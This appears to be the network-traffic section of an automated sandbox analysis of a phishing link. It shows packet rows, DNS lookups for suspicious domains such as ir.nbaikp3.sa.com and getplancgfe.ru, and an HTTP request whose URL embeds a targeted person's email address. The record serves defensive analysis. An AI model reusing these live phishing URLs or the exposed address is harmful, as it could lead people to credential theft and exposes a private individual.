                                                                                        Nov 1, 2024 13:47:05.938337088 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.938930035 CET49918443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.938956976 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.939357996 CET49918443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.939363956 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.955595016 CET4434992213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.955802917 CET4434992213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.955873013 CET49922443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.956003904 CET49922443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.956023932 CET4434992213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.956036091 CET49922443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.956042051 CET4434992213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.959037066 CET49926443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.959073067 CET4434992613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:05.959239960 CET49926443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.959239960 CET49926443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:05.959270000 CET4434992613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.067281961 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.067353964 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.067405939 CET49918443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.067675114 CET49918443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.067693949 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.067703962 CET49918443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.067708969 CET4434991813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.071422100 CET49927443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.071461916 CET4434992713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.071535110 CET49927443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.071769953 CET49927443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.071782112 CET4434992713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.458751917 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.459307909 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.459342003 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.459672928 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.459677935 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.547070026 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.547713995 CET49924443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.547729015 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.548243999 CET49924443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.548249960 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.589373112 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.589529991 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.589596987 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.589596987 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.589791059 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.589791059 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.589850903 CET49923443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.589870930 CET4434992313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.592683077 CET49928443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.592773914 CET4434992813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.592967987 CET49928443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.593110085 CET49928443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.593141079 CET4434992813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.639519930 CET4434992513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.639980078 CET49925443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.640008926 CET4434992513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.640568018 CET49925443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.640572071 CET4434992513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.677521944 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.677787066 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.678005934 CET49924443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.678005934 CET49924443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.680437088 CET49924443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.680452108 CET4434992413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.680480957 CET49929443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.680525064 CET4434992913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.680644035 CET49929443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.680726051 CET49929443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.680741072 CET4434992913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.685976982 CET4434992613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.686832905 CET49926443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.686832905 CET49926443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:47:06.686846018 CET4434992613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:47:06.686858892 CET4434992613.107.246.45192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 1, 2024 13:45:45.860053062 CET53516001.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:45.870277882 CET53511631.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.293901920 CET53601361.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.435010910 CET6051553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:47.435162067 CET5181853192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:47.442065001 CET53605151.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:47.444464922 CET53518181.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.042126894 CET6148053192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:49.042467117 CET5390353192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:49.057709932 CET53614801.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:49.058135033 CET53539031.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:50.514257908 CET4933553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:50.515088081 CET6089553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:45:50.522018909 CET53493351.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:45:50.522269964 CET53608951.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:02.930847883 CET5972653192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:02.941205978 CET53597261.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:02.947195053 CET5638453192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:02.960278034 CET53563841.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.044753075 CET53581581.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.492119074 CET5686953192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:05.492532015 CET6160753192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:05.501900911 CET53616071.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.503432989 CET53568691.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.661267042 CET138138192.168.2.4192.168.2.255
                                                                                        Nov 1, 2024 13:46:07.625448942 CET5880753192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:07.625952005 CET5868453192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:07.636837959 CET53588071.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.636852980 CET53586841.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.765315056 CET5314253192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:07.765537024 CET6285553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:07.773124933 CET53628551.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.773221016 CET53531421.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.014508009 CET5611453192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:10.014508009 CET6533753192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:10.021492958 CET53561141.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.021718025 CET53653371.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:23.683746099 CET53501471.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:26.859986067 CET5554953192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:26.860235929 CET6312553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:26.867635965 CET53631251.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:26.867769957 CET53555491.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:28.794961929 CET5544353192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:28.795404911 CET5443153192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:28.847779989 CET53544311.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:29.047915936 CET5300553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:29.048711061 CET6282953192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:29.055358887 CET53530051.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:29.056086063 CET53628291.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:29.077990055 CET53554431.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:33.235768080 CET6139153192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:33.237957954 CET6423353192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:33.328790903 CET53613911.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:33.333170891 CET53642331.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:33.508677006 CET5868153192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:33.508836031 CET5719653192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:33.515718937 CET53571961.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:33.515788078 CET53586811.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:45.502322912 CET53541201.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:46.204258919 CET53507211.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.113611937 CET5929553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:53.114056110 CET5764453192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:53.409035921 CET53576441.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.463953972 CET53592951.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.362781048 CET5799153192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:55.363795042 CET5699653192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:55.363795042 CET5075753192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:55.364069939 CET5746453192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 13:46:55.376055002 CET53579911.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.377835989 CET53569961.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.378370047 CET53574641.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.378381014 CET53507571.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:57.505099058 CET53579921.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 1, 2024 13:45:47.435010910 CET192.168.2.41.1.1.10x4d6cStandard query (0)www.google.co.thA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:47.435162067 CET192.168.2.41.1.1.10xdc91Standard query (0)www.google.co.th65IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:49.042126894 CET192.168.2.41.1.1.10x8099Standard query (0)ir.nbaikp3.sa.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:49.042467117 CET192.168.2.41.1.1.10x40dbStandard query (0)ir.nbaikp3.sa.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:50.514257908 CET192.168.2.41.1.1.10x4644Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:50.515088081 CET192.168.2.41.1.1.10xfdb2Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:02.930847883 CET192.168.2.41.1.1.10x6cf9Standard query (0)ecoutura.sa.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:02.947195053 CET192.168.2.41.1.1.10xf02eStandard query (0)ecoutura.sa.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:05.492119074 CET192.168.2.41.1.1.10xc7dbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:05.492532015 CET192.168.2.41.1.1.10xfbaeStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.625448942 CET192.168.2.41.1.1.10x3226Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.625952005 CET192.168.2.41.1.1.10xed98Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.765315056 CET192.168.2.41.1.1.10x1299Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.765537024 CET192.168.2.41.1.1.10x872cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:10.014508009 CET192.168.2.41.1.1.10x4cf7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:10.014508009 CET192.168.2.41.1.1.10xf4ecStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:26.859986067 CET192.168.2.41.1.1.10x2899Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:26.860235929 CET192.168.2.41.1.1.10x9889Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:28.794961929 CET192.168.2.41.1.1.10xe5bcStandard query (0)getplancgfe.ruA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:28.795404911 CET192.168.2.41.1.1.10x3640Standard query (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.047915936 CET192.168.2.41.1.1.10xabf1Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.048711061 CET192.168.2.41.1.1.10xba29Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.235768080 CET192.168.2.41.1.1.10x1176Standard query (0)getplancgfe.ruA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.237957954 CET192.168.2.41.1.1.10x7c94Standard query (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.508677006 CET192.168.2.41.1.1.10x18acStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.508836031 CET192.168.2.41.1.1.10xcf00Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:53.113611937 CET192.168.2.41.1.1.10xa362Standard query (0)getplancgfe.ruA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:53.114056110 CET192.168.2.41.1.1.10x3c49Standard query (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.362781048 CET192.168.2.41.1.1.10xcce2Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.363795042 CET192.168.2.41.1.1.10xc3e4Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.363795042 CET192.168.2.41.1.1.10xb14eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.364069939 CET192.168.2.41.1.1.10x450Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 1, 2024 13:45:47.442065001 CET1.1.1.1192.168.2.40x4d6cNo error (0)www.google.co.th172.217.18.3A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:49.057709932 CET1.1.1.1192.168.2.40x8099No error (0)ir.nbaikp3.sa.com82.197.65.139A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:50.522018909 CET1.1.1.1192.168.2.40x4644No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:45:50.522269964 CET1.1.1.1192.168.2.40xfdb2No error (0)www.google.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:00.589031935 CET1.1.1.1192.168.2.40xd27fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:00.589031935 CET1.1.1.1192.168.2.40xd27fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:01.232673883 CET1.1.1.1192.168.2.40xa7f8No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:01.232673883 CET1.1.1.1192.168.2.40xa7f8No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:02.941205978 CET1.1.1.1192.168.2.40x6cf9No error (0)ecoutura.sa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:02.941205978 CET1.1.1.1192.168.2.40x6cf9No error (0)ecoutura.sa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:02.960278034 CET1.1.1.1192.168.2.40xf02eNo error (0)ecoutura.sa.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:05.501900911 CET1.1.1.1192.168.2.40xfbaeNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:05.503432989 CET1.1.1.1192.168.2.40xc7dbNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:05.503432989 CET1.1.1.1192.168.2.40xc7dbNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.636837959 CET1.1.1.1192.168.2.40x3226No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.636837959 CET1.1.1.1192.168.2.40x3226No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.636852980 CET1.1.1.1192.168.2.40xed98No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.773124933 CET1.1.1.1192.168.2.40x872cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.773221016 CET1.1.1.1192.168.2.40x1299No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:07.773221016 CET1.1.1.1192.168.2.40x1299No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:10.021492958 CET1.1.1.1192.168.2.40x4cf7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:16.090691090 CET1.1.1.1192.168.2.40x7694No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:16.090691090 CET1.1.1.1192.168.2.40x7694No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:26.867635965 CET1.1.1.1192.168.2.40x9889No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:26.867769957 CET1.1.1.1192.168.2.40x2899No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:26.867769957 CET1.1.1.1192.168.2.40x2899No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:28.847779989 CET1.1.1.1192.168.2.40x3640No error (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.055358887 CET1.1.1.1192.168.2.40xabf1No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.055358887 CET1.1.1.1192.168.2.40xabf1No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.056086063 CET1.1.1.1192.168.2.40xba29No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.077990055 CET1.1.1.1192.168.2.40xe5bcNo error (0)getplancgfe.ru172.67.130.97A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:29.077990055 CET1.1.1.1192.168.2.40xe5bcNo error (0)getplancgfe.ru104.21.8.81A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.328790903 CET1.1.1.1192.168.2.40x1176No error (0)getplancgfe.ru104.21.8.81A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.328790903 CET1.1.1.1192.168.2.40x1176No error (0)getplancgfe.ru172.67.130.97A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.333170891 CET1.1.1.1192.168.2.40x7c94No error (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515718937 CET1.1.1.1192.168.2.40xcf00No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515788078 CET1.1.1.1192.168.2.40x18acNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515788078 CET1.1.1.1192.168.2.40x18acNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515788078 CET1.1.1.1192.168.2.40x18acNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515788078 CET1.1.1.1192.168.2.40x18acNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:33.515788078 CET1.1.1.1192.168.2.40x18acNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:38.806246042 CET1.1.1.1192.168.2.40xce6aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:38.806246042 CET1.1.1.1192.168.2.40xce6aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:42.855169058 CET1.1.1.1192.168.2.40x9e23No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:42.855169058 CET1.1.1.1192.168.2.40x9e23No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:53.409035921 CET1.1.1.1192.168.2.40x3c49No error (0)getplancgfe.ru65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:53.463953972 CET1.1.1.1192.168.2.40xa362No error (0)getplancgfe.ru104.21.8.81A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:53.463953972 CET1.1.1.1192.168.2.40xa362No error (0)getplancgfe.ru172.67.130.97A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.376055002 CET1.1.1.1192.168.2.40xcce2No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.376055002 CET1.1.1.1192.168.2.40xcce2No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.376055002 CET1.1.1.1192.168.2.40xcce2No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.376055002 CET1.1.1.1192.168.2.40xcce2No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.376055002 CET1.1.1.1192.168.2.40xcce2No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.377835989 CET1.1.1.1192.168.2.40xc3e4No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.378370047 CET1.1.1.1192.168.2.40x450No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.378381014 CET1.1.1.1192.168.2.40xb14eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:55.378381014 CET1.1.1.1192.168.2.40xb14eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:59.160980940 CET1.1.1.1192.168.2.40x3bdcNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 13:46:59.160980940 CET1.1.1.1192.168.2.40x3bdcNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                        • www.google.co.th
                                                                                        • fs.microsoft.com
                                                                                        • ir.nbaikp3.sa.com
                                                                                          • ecoutura.sa.com
                                                                                        • https:
                                                                                          • challenges.cloudflare.com
                                                                                          • cdnjs.cloudflare.com
                                                                                          • getplancgfe.ru
                                                                                          • cdn.jsdelivr.net
                                                                                        • a.nel.cloudflare.com
                                                                                        • otelrules.azureedge.net
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.44973982.197.65.139805772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 13:45:49.063973904 CET501OUTGET /delaw/lawn/koo/sf_rand_string_mixed(24)/bill.wafford@qurateretail.com HTTP/1.1
                                                                                        Host: ir.nbaikp3.sa.com
                                                                                        Connection: keep-alive
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
